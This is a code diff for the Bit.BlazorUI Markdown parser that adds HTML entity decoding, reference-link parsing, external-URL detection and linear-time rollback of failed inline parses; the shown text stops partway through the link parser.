@@ -38,6 +38,13 @@ public sealed class BitMarkdownBlockProcessor
     /// <summary>The current nesting depth of this processor within the document.</summary>
     internal int Depth { get; }
 
+    /// <summary>
+    /// True when these lines are the document's own, rather than the inside of a block quote, a
+    /// list item or any other nested container. A construct that is only meaningful at the top of
+    /// a file - front matter, for one - checks this before claiming its lines.
+    /// </summary>
+    public bool IsTopLevel => Depth == 0;
+
     /// <summary>The lines being parsed in the current scope.</summary>
     public IReadOnlyList<string> Lines { get; }
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockquoteParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockquoteParser.cs
@@ -41,7 +41,9 @@ public sealed class BitMarkdownBlockquoteParser : BitMarkdownBlockParser
         }
 
         var quote = new BitMarkdownBlockquoteNode();
-        quote.Children.AddRange(state.ParseBlocks(inner));
+        // Every branch of the loop above consumed exactly one line for one inner line, so the
+        // quoted content maps one-to-one onto the lines from the marker on.
+        quote.Children.AddRange(state.ParseBlocks(inner, state.Line));
         output.Add(quote);
         state.Line = i;
         return true;

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownEntities.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownEntities.cs
@@ -1,0 +1,187 @@
+using System.Globalization;
+using System.Text;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Decodes HTML entity references (<c>&amp;copy;</c>) and numeric character references
+/// (<c>&amp;#169;</c>, <c>&amp;#xA9;</c>), which CommonMark recognizes everywhere except
+/// inside code spans and code blocks.
+/// </summary>
+/// <remarks>
+/// Decoding happens while parsing, so the decoded text is an ordinary string that Blazor
+/// escapes again on the way into the DOM. <c>&amp;lt;script&amp;gt;</c> therefore renders
+/// as the visible text <c>&lt;script&gt;</c> and never as markup.
+/// </remarks>
+public static class BitMarkdownEntities
+{
+    /// <summary>The longest named reference recognized, used to bound the lookahead.</summary>
+    private const int MaxNameLength = 32;
+
+    // The HTML 4 named character references plus the handful of HTML5 additions that
+    // appear in real documents. A full HTML5 table is ~2200 names; this covers what
+    // Markdown actually uses without shipping the table.
+    private static readonly Dictionary<string, string> Named = new(StringComparer.Ordinal)
+    {
+        // Markup-significant and whitespace
+        ["amp"] = "&", ["lt"] = "<", ["gt"] = ">", ["quot"] = "\"", ["apos"] = "'",
+        ["nbsp"] = " ", ["ensp"] = " ", ["emsp"] = " ", ["thinsp"] = " ",
+        ["zwnj"] = "‌", ["zwj"] = "‍", ["lrm"] = "‎", ["rlm"] = "‏",
+        // Latin-1 punctuation and symbols
+        ["iexcl"] = "¡", ["cent"] = "¢", ["pound"] = "£", ["curren"] = "¤",
+        ["yen"] = "¥", ["brvbar"] = "¦", ["sect"] = "§", ["uml"] = "¨",
+        ["copy"] = "©", ["ordf"] = "ª", ["laquo"] = "«", ["not"] = "¬",
+        ["shy"] = "­", ["reg"] = "®", ["macr"] = "¯", ["deg"] = "°",
+        ["plusmn"] = "±", ["sup2"] = "²", ["sup3"] = "³", ["acute"] = "´",
+        ["micro"] = "µ", ["para"] = "¶", ["middot"] = "·", ["cedil"] = "¸",
+        ["sup1"] = "¹", ["ordm"] = "º", ["raquo"] = "»", ["frac14"] = "¼",
+        ["frac12"] = "½", ["frac34"] = "¾", ["iquest"] = "¿", ["times"] = "×",
+        ["divide"] = "÷",
+        // Latin-1 letters
+        ["Agrave"] = "À", ["Aacute"] = "Á", ["Acirc"] = "Â", ["Atilde"] = "Ã",
+        ["Auml"] = "Ä", ["Aring"] = "Å", ["AElig"] = "Æ", ["Ccedil"] = "Ç",
+        ["Egrave"] = "È", ["Eacute"] = "É", ["Ecirc"] = "Ê", ["Euml"] = "Ë",
+        ["Igrave"] = "Ì", ["Iacute"] = "Í", ["Icirc"] = "Î", ["Iuml"] = "Ï",
+        ["ETH"] = "Ð", ["Ntilde"] = "Ñ", ["Ograve"] = "Ò", ["Oacute"] = "Ó",
+        ["Ocirc"] = "Ô", ["Otilde"] = "Õ", ["Ouml"] = "Ö", ["Oslash"] = "Ø",
+        ["Ugrave"] = "Ù", ["Uacute"] = "Ú", ["Ucirc"] = "Û", ["Uuml"] = "Ü",
+        ["Yacute"] = "Ý", ["THORN"] = "Þ", ["szlig"] = "ß",
+        ["agrave"] = "à", ["aacute"] = "á", ["acirc"] = "â", ["atilde"] = "ã",
+        ["auml"] = "ä", ["aring"] = "å", ["aelig"] = "æ", ["ccedil"] = "ç",
+        ["egrave"] = "è", ["eacute"] = "é", ["ecirc"] = "ê", ["euml"] = "ë",
+        ["igrave"] = "ì", ["iacute"] = "í", ["icirc"] = "î", ["iuml"] = "ï",
+        ["eth"] = "ð", ["ntilde"] = "ñ", ["ograve"] = "ò", ["oacute"] = "ó",
+        ["ocirc"] = "ô", ["otilde"] = "õ", ["ouml"] = "ö", ["oslash"] = "ø",
+        ["ugrave"] = "ù", ["uacute"] = "ú", ["ucirc"] = "û", ["uuml"] = "ü",
+        ["yacute"] = "ý", ["thorn"] = "þ", ["yuml"] = "ÿ",
+        ["OElig"] = "Œ", ["oelig"] = "œ", ["Scaron"] = "Š", ["scaron"] = "š",
+        ["Yuml"] = "Ÿ", ["fnof"] = "ƒ",
+        // General punctuation
+        ["ndash"] = "–", ["mdash"] = "—", ["lsquo"] = "‘", ["rsquo"] = "’",
+        ["sbquo"] = "‚", ["ldquo"] = "“", ["rdquo"] = "”", ["bdquo"] = "„",
+        ["dagger"] = "†", ["Dagger"] = "‡", ["bull"] = "•", ["hellip"] = "…",
+        ["permil"] = "‰", ["prime"] = "′", ["Prime"] = "″", ["lsaquo"] = "‹",
+        ["rsaquo"] = "›", ["oline"] = "‾", ["frasl"] = "⁄", ["euro"] = "€",
+        ["trade"] = "™", ["image"] = "ℑ", ["real"] = "ℜ", ["weierp"] = "℘",
+        ["alefsym"] = "ℵ",
+        // Arrows and math
+        ["larr"] = "←", ["uarr"] = "↑", ["rarr"] = "→", ["darr"] = "↓",
+        ["harr"] = "↔", ["crarr"] = "↵", ["lArr"] = "⇐", ["uArr"] = "⇑",
+        ["rArr"] = "⇒", ["dArr"] = "⇓", ["hArr"] = "⇔",
+        ["forall"] = "∀", ["part"] = "∂", ["exist"] = "∃", ["empty"] = "∅",
+        ["nabla"] = "∇", ["isin"] = "∈", ["notin"] = "∉", ["ni"] = "∋",
+        ["prod"] = "∏", ["sum"] = "∑", ["minus"] = "−", ["lowast"] = "∗",
+        ["radic"] = "√", ["prop"] = "∝", ["infin"] = "∞", ["ang"] = "∠",
+        ["and"] = "∧", ["or"] = "∨", ["cap"] = "∩", ["cup"] = "∪",
+        ["int"] = "∫", ["there4"] = "∴", ["sim"] = "∼", ["cong"] = "≅",
+        ["asymp"] = "≈", ["ne"] = "≠", ["equiv"] = "≡", ["le"] = "≤",
+        ["ge"] = "≥", ["sub"] = "⊂", ["sup"] = "⊃", ["nsub"] = "⊄",
+        ["sube"] = "⊆", ["supe"] = "⊇", ["oplus"] = "⊕", ["otimes"] = "⊗",
+        ["perp"] = "⊥", ["sdot"] = "⋅", ["lceil"] = "⌈", ["rceil"] = "⌉",
+        ["lfloor"] = "⌊", ["rfloor"] = "⌋", ["lang"] = "〈", ["rang"] = "〉",
+        ["loz"] = "◊", ["spades"] = "♠", ["clubs"] = "♣", ["hearts"] = "♥",
+        ["diams"] = "♦",
+        // Greek
+        ["Alpha"] = "Α", ["Beta"] = "Β", ["Gamma"] = "Γ", ["Delta"] = "Δ",
+        ["Epsilon"] = "Ε", ["Zeta"] = "Ζ", ["Eta"] = "Η", ["Theta"] = "Θ",
+        ["Iota"] = "Ι", ["Kappa"] = "Κ", ["Lambda"] = "Λ", ["Mu"] = "Μ",
+        ["Nu"] = "Ν", ["Xi"] = "Ξ", ["Omicron"] = "Ο", ["Pi"] = "Π",
+        ["Rho"] = "Ρ", ["Sigma"] = "Σ", ["Tau"] = "Τ", ["Upsilon"] = "Υ",
+        ["Phi"] = "Φ", ["Chi"] = "Χ", ["Psi"] = "Ψ", ["Omega"] = "Ω",
+        ["alpha"] = "α", ["beta"] = "β", ["gamma"] = "γ", ["delta"] = "δ",
+        ["epsilon"] = "ε", ["zeta"] = "ζ", ["eta"] = "η", ["theta"] = "θ",
+        ["iota"] = "ι", ["kappa"] = "κ", ["lambda"] = "λ", ["mu"] = "μ",
+        ["nu"] = "ν", ["xi"] = "ξ", ["omicron"] = "ο", ["pi"] = "π",
+        ["rho"] = "ρ", ["sigmaf"] = "ς", ["sigma"] = "σ", ["tau"] = "τ",
+        ["upsilon"] = "υ", ["phi"] = "φ", ["chi"] = "χ", ["psi"] = "ψ",
+        ["omega"] = "ω", ["thetasym"] = "ϑ", ["upsih"] = "ϒ", ["piv"] = "ϖ",
+        // Diacritics
+        ["circ"] = "ˆ", ["tilde"] = "˜",
+        // Checks and crosses (common HTML5 names in documentation)
+        ["check"] = "✓", ["cross"] = "✗", ["star"] = "☆", ["starf"] = "★",
+    };
+
+    /// <summary>
+    /// Tries to read an entity or numeric character reference starting at the <c>&amp;</c>
+    /// found at <paramref name="index"/>.
+    /// </summary>
+    /// <param name="s">The text being scanned.</param>
+    /// <param name="index">The index of the <c>&amp;</c> that opens the candidate reference.</param>
+    /// <param name="value">The decoded text.</param>
+    /// <param name="length">How many source characters the reference occupied.</param>
+    public static bool TryDecodeAt(string s, int index, out string value, out int length)
+    {
+        value = string.Empty;
+        length = 0;
+
+        if (index >= s.Length || s[index] != '&') return false;
+
+        int i = index + 1;
+        if (i >= s.Length) return false;
+
+        if (s[i] == '#')
+        {
+            i++;
+            bool hex = i < s.Length && (s[i] is 'x' or 'X');
+            if (hex) i++;
+
+            int digitStart = i;
+            while (i < s.Length && (hex ? Uri.IsHexDigit(s[i]) : char.IsAsciiDigit(s[i]))) i++;
+
+            int digits = i - digitStart;
+            // CommonMark bounds numeric references at 1-7 digits (hex references at 1-6).
+            if (digits == 0 || digits > (hex ? 6 : 7)) return false;
+            if (i >= s.Length || s[i] != ';') return false;
+
+            var span = s.AsSpan(digitStart, digits);
+            if (int.TryParse(span, hex ? NumberStyles.HexNumber : NumberStyles.None, CultureInfo.InvariantCulture, out int code) is false)
+                return false;
+
+            value = FromCodePoint(code);
+            length = i + 1 - index;
+            return true;
+        }
+
+        int nameStart = i;
+        while (i < s.Length && i - nameStart <= MaxNameLength && char.IsAsciiLetterOrDigit(s[i])) i++;
+        if (i == nameStart || i >= s.Length || s[i] != ';') return false;
+
+        if (Named.TryGetValue(s[nameStart..i], out var named) is false) return false;
+
+        value = named;
+        length = i + 1 - index;
+        return true;
+    }
+
+    /// <summary>
+    /// Decodes every entity and numeric character reference in <paramref name="text"/>.
+    /// Used for the places the inline scanner does not reach - link destinations and titles.
+    /// </summary>
+    public static string Decode(string text)
+    {
+        if (string.IsNullOrEmpty(text) || text.IndexOf('&') < 0) return text;
+
+        var sb = new StringBuilder(text.Length);
+        for (int i = 0; i < text.Length;)
+        {
+            if (text[i] == '&' && TryDecodeAt(text, i, out var value, out int length))
+            {
+                sb.Append(value);
+                i += length;
+                continue;
+            }
+            sb.Append(text[i++]);
+        }
+        return sb.ToString();
+    }
+
+    // Per the spec, NUL, surrogates and out-of-range code points become U+FFFD rather
+    // than producing an invalid string.
+    private static string FromCodePoint(int code)
+    {
+        if (code is 0 or > 0x10FFFF || (code >= 0xD800 && code <= 0xDFFF))
+            return "�";
+
+        return char.ConvertFromUtf32(code);
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownEntityInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownEntityInlineParser.cs
@@ -1,0 +1,24 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Turns HTML entity references (<c>&amp;copy;</c>) and numeric character references
+/// (<c>&amp;#169;</c>, <c>&amp;#xA9;</c>) into the characters they name. An unrecognized
+/// sequence is left exactly as written.
+/// </summary>
+public sealed class BitMarkdownEntityInlineParser : BitMarkdownInlineParser
+{
+    public override char[] TriggerChars => new[] { '&' };
+
+    public override bool TryParse(BitMarkdownInlineProcessor state)
+    {
+        if (BitMarkdownEntities.TryDecodeAt(state.Text, state.Pos, out var value, out int length) is false)
+            return false;
+
+        // The decoded text is appended to the pending literal run, so it is ordinary text
+        // that Blazor escapes on the way out: "&lt;b&gt;" shows the characters "<b>" and
+        // can never become markup.
+        state.AppendText(value);
+        state.Pos += length;
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineHelpers.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineHelpers.cs
@@ -36,6 +36,11 @@ public static class BitMarkdownInlineHelpers
                     case BitMarkdownCodeSpanNode c: sb.Append(c.Content); break;
                     case BitMarkdownImageNode im: sb.Append(im.Alt); break;
                     case BitMarkdownLineBreakNode: sb.Append(' '); break;
+                    // Two flavors put their text on the node itself rather than in a child text
+                    // run; without these, a heading holding either of them would slug as if the
+                    // words were not there.
+                    case BitMarkdownMathNode math: sb.Append(math.Content); break;
+                    case BitMarkdownAbbreviationNode ab: sb.Append(ab.Text); break;
                     default:
                         if (node.ChildNodes is { } children) Append(children, sb);
                         break;

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineParser.cs
@@ -9,6 +9,14 @@ public abstract class BitMarkdownInlineParser
     public abstract char[] TriggerChars { get; }
 
     /// <summary>
+    /// Relative priority among the parsers sharing a trigger character. Lower is consulted
+    /// first; the core parsers all use the default. An extension whose syntax is a special
+    /// case of a core one (footnote references, for example, start like a link label) gives
+    /// itself a lower value so it is offered the position first.
+    /// </summary>
+    public virtual int Order => 100;
+
+    /// <summary>
     /// Attempts to parse at <see cref="BitMarkdownInlineProcessor.Pos"/>. On success the parser
     /// emits node(s) via the processor, advances <see cref="BitMarkdownInlineProcessor.Pos"/>,
     /// and returns true. On failure it must leave the position unchanged.

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineProcessor.cs
@@ -14,22 +14,32 @@ public sealed class BitMarkdownInlineProcessor
     private readonly List<Tok> _tokens = new();
 
     internal BitMarkdownInlineProcessor(BitMarkdownPipeline pipeline)
-        : this(pipeline, BitMarkdownParseOptions.Default, 0)
+        : this(pipeline, BitMarkdownParseContext.Empty, 0)
     {
     }
 
-    internal BitMarkdownInlineProcessor(BitMarkdownPipeline pipeline, BitMarkdownParseOptions options, int depth)
+    internal BitMarkdownInlineProcessor(BitMarkdownPipeline pipeline, BitMarkdownParseContext context, int depth)
     {
         Pipeline = pipeline;
-        Options = options;
+        Context = context;
         Depth = depth;
     }
 
     /// <summary>The owning pipeline.</summary>
     public BitMarkdownPipeline Pipeline { get; }
 
+    /// <summary>The state shared by every parser taking part in this parse.</summary>
+    internal BitMarkdownParseContext Context { get; }
+
     /// <summary>The safety limits in effect for this parse.</summary>
-    internal BitMarkdownParseOptions Options { get; }
+    internal BitMarkdownParseOptions Options => Context.Options;
+
+    /// <summary>
+    /// True when the document declares a <c>[label]:</c> definition line for the supplied
+    /// (already normalized) label. Inline parsers consult this before turning bracketed
+    /// text into a reference, since definitions may appear after their references.
+    /// </summary>
+    public bool HasReferenceLabel(string normalizedLabel) => Context.ReferenceLabels.Contains(normalizedLabel);
 
     /// <summary>The current nesting depth of this processor within the document.</summary>
     internal int Depth { get; }
@@ -53,7 +63,7 @@ public sealed class BitMarkdownInlineProcessor
     }
 
     /// <summary>Parses inline content in an isolated child processor (e.g. for a link label).</summary>
-    public List<BitMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text, Options, Depth + 1);
+    public List<BitMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text, Context, Depth + 1);
 
     // -- API used by inline parsers ----------------------------------------
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownInlineProcessor.cs
@@ -12,6 +12,12 @@ public sealed class BitMarkdownInlineProcessor
 {
     private readonly StringBuilder _literal = new();
     private readonly List<Tok> _tokens = new();
+    private Dictionary<(Type Parser, int Variant), int>? _noMatchFrom;
+    // Set while a parser is being offered a position it may not take, so the pending text run can
+    // be put back if it does not. See TryParsers.
+    private bool _speculating;
+    private int _literalMark;
+    private string? _literalBackup;
 
     internal BitMarkdownInlineProcessor(BitMarkdownPipeline pipeline)
         : this(pipeline, BitMarkdownParseContext.Empty, 0)
@@ -57,6 +63,10 @@ public sealed class BitMarkdownInlineProcessor
         Pos = 0;
         _literal.Clear();
         _tokens.Clear();
+        _noMatchFrom?.Clear();
+        _speculating = false;
+        _literalMark = 0;
+        _literalBackup = null;
         Scan();
         BitMarkdownDelimiterResolver.Process(_tokens, Pipeline);
         return ToNodes(_tokens);
@@ -80,9 +90,44 @@ public sealed class BitMarkdownInlineProcessor
         _tokens.Add(new Tok { Kind = TokKind.Node, Node = node });
     }
 
+    /// <summary>
+    /// Records that <paramref name="parser"/> has scanned from <paramref name="position"/> to the
+    /// end of <see cref="Text"/> without finding what it needs to close its construct, so a later
+    /// attempt starting further along cannot find one either.
+    /// </summary>
+    /// <remarks>
+    /// This is what keeps a paragraph full of trigger characters that never close - a page of
+    /// prices, each with a <c>$</c> - linear instead of quadratic: without it every one of them
+    /// rescans the whole remainder of the paragraph. Only a parser whose closing delimiter is
+    /// valid or not on its own terms, independently of where the scan began, may say so; the memo
+    /// lives on this processor, which is created per block, so it is per-parse state and does not
+    /// make the parser itself stateful. <paramref name="variant"/> separates the shapes a parser
+    /// looks for when a failure to find one says nothing about the others - for mathematics, the
+    /// one- and two-character delimiters.
+    /// </remarks>
+    public void SetNoMatchFrom(BitMarkdownInlineParser parser, int variant, int position)
+    {
+        var key = (parser.GetType(), variant);
+        _noMatchFrom ??= new Dictionary<(Type, int), int>();
+        // The earliest such position is the strongest statement, and it implies every later one.
+        if (_noMatchFrom.TryGetValue(key, out int known) is false || position < known)
+            _noMatchFrom[key] = position;
+    }
+
+    /// <summary>
+    /// True when <see cref="SetNoMatchFrom"/> has already ruled out a match from
+    /// <paramref name="position"/> onwards, so this attempt can fail without scanning.
+    /// </summary>
+    public bool HasNoMatchFrom(BitMarkdownInlineParser parser, int variant, int position)
+        => _noMatchFrom is not null
+           && _noMatchFrom.TryGetValue((parser.GetType(), variant), out int known)
+           && position >= known;
+
     /// <summary>Removes trailing spaces from the pending text run and returns how many were removed.</summary>
     public int TrimPendingTrailingSpaces()
     {
+        BackUpPendingText();
+
         int removed = 0;
         while (_literal.Length > 0 && _literal[^1] == ' ')
         {
@@ -96,9 +141,25 @@ public sealed class BitMarkdownInlineProcessor
     {
         if (_literal.Length > 0)
         {
+            BackUpPendingText();
             _tokens.Add(new Tok { Kind = TokKind.Text, Text = _literal.ToString() });
             _literal.Clear();
         }
+    }
+
+    // Keeps a copy of the pending text run before something about to happen removes part of it, so
+    // a speculative parse that then fails can be undone. Taken here, at the moment the run is
+    // actually disturbed, rather than before every attempt: the run grows with the text between one
+    // node and the next, and copying it at each trigger character is what made a paragraph of
+    // prices - a "$" every few words, none of them opening any mathematics - quadratic in its own
+    // length. Appends need no copy at all; the mark the attempt took is enough to trim them back.
+    private void BackUpPendingText()
+    {
+        if (_speculating is false || _literalBackup is not null) return;
+
+        // Only what was pending before this attempt began. Anything the parser appended on its way
+        // here is undone by the rollback in any case, and copying it too would put it back.
+        _literalBackup = _literal.ToString(0, Math.Min(_literalMark, _literal.Length));
     }
 
     // -- Scanning -----------------------------------------------------------
@@ -135,33 +196,65 @@ public sealed class BitMarkdownInlineProcessor
             // Trigger-based inline parsers.
             if (Pipeline.InlineParsersByChar.TryGetValue(c, out var parsers))
             {
-                int save = Pos;
-                int tokenCount = _tokens.Count;
-                string literalSnapshot = _literal.ToString();
-                bool handled = false;
-                foreach (var p in parsers)
-                {
-                    // Only honor a parser that both succeeds and consumes input.
-                    if (p.TryParse(this) && Pos > save)
-                    {
-                        handled = true;
-                        break;
-                    }
-                    // Roll back every side effect (position, flushed tokens and pending
-                    // text), not just Pos, so a failed or no-op parser can't corrupt the
-                    // token stream for the parsers tried next or the normal scan.
-                    Pos = save;
-                    if (_tokens.Count > tokenCount) _tokens.RemoveRange(tokenCount, _tokens.Count - tokenCount);
-                    _literal.Clear();
-                    _literal.Append(literalSnapshot);
-                }
-                if (handled) continue;
+                if (TryParsers(parsers)) continue;
             }
 
             _literal.Append(c);
             Pos++;
         }
         Flush();
+    }
+
+    // Offers the current position to each parser registered for the character there, in order,
+    // until one both succeeds and consumes input. Returns whether one did.
+    private bool TryParsers(IReadOnlyList<BitMarkdownInlineParser> parsers)
+    {
+        int save = Pos;
+        int tokenCount = _tokens.Count;
+        int literalMark = _literal.Length;
+
+        bool wasSpeculating = _speculating;
+        int outerMark = _literalMark;
+        string? outerBackup = _literalBackup;
+        _speculating = true;
+        _literalMark = literalMark;
+        _literalBackup = null;
+
+        try
+        {
+            foreach (var p in parsers)
+            {
+                if (p.TryParse(this) && Pos > save) return true;
+
+                // Roll back every side effect (position, flushed tokens and pending text), not
+                // just Pos, so a failed or no-op parser can't corrupt the token stream for the
+                // parsers tried next or the normal scan. A parser that only appended to the
+                // pending run is undone by trimming it back to the mark; one that flushed or
+                // trimmed it left a copy behind to restore from.
+                Pos = save;
+                if (_tokens.Count > tokenCount) _tokens.RemoveRange(tokenCount, _tokens.Count - tokenCount);
+                if (_literalBackup is null)
+                {
+                    _literal.Length = literalMark;
+                }
+                else
+                {
+                    _literal.Clear();
+                    _literal.Append(_literalBackup);
+                    _literalBackup = null;
+                }
+            }
+
+            return false;
+        }
+        finally
+        {
+            // A parser may parse inline content of its own, which runs another scan through this
+            // same method; the outer attempt's mark and copy are its own to keep.
+            _speculating = wasSpeculating;
+            _literalMark = outerMark;
+            _literalBackup = outerBackup;
+        }
     }
 
     private static void ComputeFlanking(char prev, char next, out bool leftFlanking, out bool rightFlanking)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkHelpers.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkHelpers.cs
@@ -12,6 +12,22 @@ public static class BitMarkdownLinkHelpers
     public const int MaxLabelLength = 999;
 
     /// <summary>
+    /// True when <paramref name="url"/> is a destination that leaves the page's own origin, which
+    /// is what decides the <c>target</c> and <c>rel</c> a rendered link carries.
+    /// </summary>
+    /// <remarks>
+    /// A protocol-relative destination (<c>//host/path</c>) counts: the sanitizer allows it, and a
+    /// browser resolves it to another host exactly as an <c>https://</c> one would. Reading it as
+    /// internal is what would leave a <c>[spam](//evil.com)</c> without the <c>nofollow ugc</c> a
+    /// user-generated-content policy exists to put on it.
+    /// </remarks>
+    public static bool IsExternalUrl(string? url)
+        => string.IsNullOrEmpty(url) is false
+           && (url.StartsWith("http://", StringComparison.OrdinalIgnoreCase)
+               || url.StartsWith("https://", StringComparison.OrdinalIgnoreCase)
+               || url.StartsWith("//", StringComparison.Ordinal));
+
+    /// <summary>
     /// Returns the index of the <c>]</c> that closes the label opened at
     /// <paramref name="openBracket"/>, or -1 when there is none. Backslash escapes are
     /// skipped, nested brackets are balanced, and code spans are stepped over so a

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkHelpers.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkHelpers.cs
@@ -1,0 +1,94 @@
+using System.Text;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Shared helpers for the pieces of the grammar that deal with link labels: inline links
+/// and images, reference links, link reference definitions and footnotes.
+/// </summary>
+public static class BitMarkdownLinkHelpers
+{
+    /// <summary>The CommonMark ceiling on the length of a link label.</summary>
+    public const int MaxLabelLength = 999;
+
+    /// <summary>
+    /// Returns the index of the <c>]</c> that closes the label opened at
+    /// <paramref name="openBracket"/>, or -1 when there is none. Backslash escapes are
+    /// skipped, nested brackets are balanced, and code spans are stepped over so a
+    /// <c>]</c> inside backticks does not end the label early.
+    /// </summary>
+    public static int FindLabelEnd(string s, int openBracket)
+    {
+        int depth = 0;
+        int i = openBracket;
+        while (i < s.Length)
+        {
+            char c = s[i];
+            if (c == '\\') { i += 2; continue; }
+            if (c == '`')
+            {
+                i = SkipCodeSpan(s, i);
+                continue;
+            }
+            if (c == '[') depth++;
+            else if (c == ']')
+            {
+                depth--;
+                if (depth == 0) return i;
+            }
+            i++;
+        }
+        return -1;
+    }
+
+    /// <summary>
+    /// Given the index of a backtick, returns the index just past a matching closing
+    /// code-span run. If no closing run of equal length exists, the backticks are literal
+    /// text and the index just past the opening run is returned.
+    /// </summary>
+    public static int SkipCodeSpan(string s, int i)
+    {
+        int start = i;
+        int openLen = 0;
+        while (i < s.Length && s[i] == '`') { i++; openLen++; }
+
+        int j = i;
+        while (j < s.Length)
+        {
+            if (s[j] == '`')
+            {
+                int closeLen = 0;
+                while (j < s.Length && s[j] == '`') { j++; closeLen++; }
+                if (closeLen == openLen) return j;
+            }
+            else j++;
+        }
+        return start + openLen;
+    }
+
+    /// <summary>
+    /// Normalizes a link label the way CommonMark matches them: the surrounding whitespace
+    /// is trimmed, internal whitespace runs collapse to a single space, and the result is
+    /// case-folded. <c>[Foo   Bar]</c> and <c>[foo bar]</c> therefore name the same definition.
+    /// </summary>
+    public static string NormalizeLabel(string label)
+    {
+        var sb = new StringBuilder(label.Length);
+        bool pendingSpace = false;
+        foreach (char c in label)
+        {
+            if (char.IsWhiteSpace(c))
+            {
+                pendingSpace = sb.Length > 0;
+                continue;
+            }
+            if (pendingSpace)
+            {
+                sb.Append(' ');
+                pendingSpace = false;
+            }
+            sb.Append(c);
+        }
+        return sb.ToString().ToLowerInvariant();
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkInlineParser.cs
@@ -2,7 +2,12 @@ using System.Text;
 
 namespace Bit.BlazorUI;
 
-/// <summary>Handles inline links <c>[text](url "title")</c> and images <c>![alt](url)</c>.</summary>
+/// <summary>
+/// Handles inline links <c>[text](url "title")</c> and images <c>![alt](url)</c>, plus the
+/// three reference forms - full <c>[text][ref]</c>, collapsed <c>[text][]</c> and shortcut
+/// <c>[text]</c> - whose destination comes from a link reference definition elsewhere in
+/// the document.
+/// </summary>
 public sealed class BitMarkdownLinkInlineParser : BitMarkdownInlineParser
 {
     public override char[] TriggerChars => new[] { '[', '!' };
@@ -15,18 +20,89 @@ public sealed class BitMarkdownLinkInlineParser : BitMarkdownInlineParser
         int bracket = isImage ? i + 1 : i;
         if (bracket >= s.Length || s[bracket] != '[') return false;
 
-        int labelEnd = FindLabelEnd(s, bracket);
+        int labelEnd = BitMarkdownLinkHelpers.FindLabelEnd(s, bracket);
         if (labelEnd < 0) return false;
-
-        int p = labelEnd + 1;
-        if (p >= s.Length || s[p] != '(') return false;
 
         string label = s.Substring(bracket + 1, labelEnd - bracket - 1);
 
-        int q = p + 1;
+        int p = labelEnd + 1;
+        if (p < s.Length && s[p] == '(')
+            return TryParseInline(state, s, label, isImage, p);
+
+        return TryParseReference(state, s, label, isImage, labelEnd);
+    }
+
+    private static bool TryParseInline(BitMarkdownInlineProcessor state, string s, string label, bool isImage, int openParen)
+    {
+        int q = openParen + 1;
         if (!ParseDestination(s, ref q, out string url, out string? title)) return false;
         if (q >= s.Length || s[q] != ')') return false;
 
+        Emit(state, label, isImage, BitMarkdownEntities.Decode(url), title);
+        state.Pos = q + 1;
+        return true;
+    }
+
+    // Full, collapsed and shortcut references all resolve against a link reference
+    // definition, which may appear anywhere in the document - including after this point.
+    // Rather than guess, the parser emits an unresolved node that
+    // BitMarkdownLinkReferenceAstProcessor rewrites once the whole document is parsed. It
+    // only does so for a label the document actually defines (the pre-scan knows them all),
+    // so ordinary bracketed prose in a document with no definitions is scanned untouched.
+    private static bool TryParseReference(BitMarkdownInlineProcessor state, string s, string label, bool isImage, int labelEnd)
+    {
+        string reference;
+        string suffix;
+        int end;
+
+        int p = labelEnd + 1;
+        if (p < s.Length && s[p] == '[')
+        {
+            int referenceEnd = BitMarkdownLinkHelpers.FindLabelEnd(s, p);
+            if (referenceEnd < 0) return false;
+
+            string inner = s.Substring(p + 1, referenceEnd - p - 1);
+            if (inner.Trim().Length == 0)
+            {
+                // Collapsed: "[text][]" reuses the text as the reference label.
+                reference = label;
+                suffix = "][]";
+            }
+            else
+            {
+                reference = inner;
+                suffix = "][" + inner + "]";
+            }
+            end = referenceEnd;
+        }
+        else
+        {
+            // Shortcut: "[text]" is itself the reference label.
+            reference = label;
+            suffix = "]";
+            end = labelEnd;
+        }
+
+        string normalized = BitMarkdownLinkHelpers.NormalizeLabel(reference);
+        if (normalized.Length == 0 || normalized.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+        if (state.HasReferenceLabel(normalized) is false) return false;
+
+        var node = new BitMarkdownLinkReferenceNode
+        {
+            Label = normalized,
+            IsImage = isImage,
+            RawPrefix = isImage ? "![" : "[",
